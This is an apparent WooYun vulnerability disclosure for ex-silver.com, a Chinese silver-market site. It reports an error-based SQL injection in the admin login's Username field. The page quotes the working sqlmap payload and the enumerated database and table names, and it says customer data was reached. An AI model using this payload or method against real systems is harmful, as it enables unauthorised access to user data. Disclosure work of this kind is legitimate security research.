当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0176567

漏洞标题:中国白银网高危漏洞后台POST注入导致大量用户资料泄漏

相关厂商:ex-silver.com

漏洞作者: 阿圣

提交时间:2016-02-17 23:05

修复时间:2016-02-22 23:10

公开时间:2016-02-22 23:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-17: 细节已通知厂商并且等待厂商处理中
2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

后台:http://www.ex-silver.com/Admin/Login.aspx

详细说明:

burp抓的包

HAY_5WSYTC~CHKFR))__N95.png


用sqlmap跑了下数据库

H7LZO`LRNU3$8__ARAYC`[7.png


[22:03:05] [INFO] parsing HTTP request from 'post.txt'
[22:03:05] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:03:05] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: Username (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Username=test' AND 1092=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR
(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1092=1092) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'qdEN'='qdEN&
Password=123456a&loginyzm=kit6&cSubmit=true
---
[22:03:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[22:03:05] [INFO] fetching database names
[22:03:05] [INFO] the SQL query used returns 11 entries
[22:03:05] [INFO] resumed: exSilver
[22:03:05] [INFO] resumed: ex-silver_0727
[22:03:05] [INFO] resumed: ex-silver_0730
[22:03:05] [INFO] resumed: ex-silver_31
[22:03:05] [INFO] resumed: master
[22:03:05] [INFO] resumed: model
[22:03:05] [INFO] resumed: msdb
[22:03:05] [INFO] resumed: ReportServer
[22:03:05] [INFO] resumed: ReportServerTempDB
[22:03:05] [INFO] resumed: SnailCMS
[22:03:05] [INFO] resumed: tempdb
available databases [11]:
[*] ex-silver_0727
[*] ex-silver_0730
[*] ex-silver_31
[*] exSilver
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SnailCMS
[*] tempdb


exSilver数据库里面的116个表

Database: exSilver
[116 tables]
+-----------------------------+
| ActionLog |
| ActiveCustomers |
| Ad |
| Advertising |
| AnnualMeeting |
| Ballot |
| BallotIp |
| Banner |
| BuyInfo |
| CFTCSilver |
| CaiJinEvent |
| Calendar |
| CentralResult |
| ChangJIangColorNowPrice |
| ChinaCPI |
| ChinaGDP |
| ChinaPMI |
| ChinaPPI |
| ChinaSpend |
| Council |
| CountrySilver |
| CustAndNode |
| CustLevel |
| Customer |
| CustomerType |
| D99_CMD |
| D99_Tmp |
| DataBaiYinDingPanJia |
| DataDiaoJiZhongXin |
| DataDownload |
| DataGuiJinShuPrice |
| DataTouZiYinTiao |
| Englandbank |
| Europebank |
| Exchange |
| Famous |
| FedTable |
| FileInfo |
| FileType |
| FileTypeAndPersonnel |
| Fixedprice |
| Friendly |
| GSpotPrice |
| GoldETF |
| GoldETFStock |
| GoldProduction |
| Goldsupply |
| GuangDongSouthColorNowPrice |
| Guests |
| Holiday |
| HuaYin999 |
| HuaYin999_20150323 |
| Integrated |
| Investment |
| Japanbank |
| LevelInfo |
| LevelRole |
| Meeting |
| MenuPage |
| NetworkSelection |
| NetworkVoting |
| NewsKey |
| Nonferrous |
| OnlineCompany |
| OnlineUser |
| OuZhouWarGoldPrice |
| OuZhouWarSmallGold |
| PageWeb |
| PayAttention |
| PayAttentionOptions |
| Personnel |
| PersonnelFileType |
| PersonnelRole |
| PreviousMeeting |
| QuoteType |
| RealTimeQuotes |
| RegisterVip |
| Reportsummary |
| Research |
| Role |
| Rule |
| SellInfo |
| ShangHaiColorNowPrice |
| SilverData |
| SilverETF |
| SilverETF_20150617bak |
| SilverOutput |
| SilverOutputData |
| SilverPremium |
| Silveragio |
| Silverproduction |
| Silversupply |
| SoftwareDownload |
| Stock |
| SwapCenter |
| Template |
| ThematicInvestment |
| UKGDP |
| UsaAnnualGDP |
| UsaDataCentres |
| UsaHomesales |
| UsaIdleness |
| UsaPayrollsData |
| UsaPriceindex |
| UsaRetailsales |
| Userprice |
| V_SellInfo |
| WebNode |
| WebPage |
| Website_editor |
| applyfunc |
| base_price |
| business |
| pangolin_test_table |
| sqlmapoutput |
| yinfu |
+-----------------------------+

漏洞证明:

Customer数据库里面的内容。

JT`(LB7`DYG3OYGAK`DQM]Y.png

修复方案:

加强过滤验证

版权声明:转载请注明来源 阿圣@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-22 23:10

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价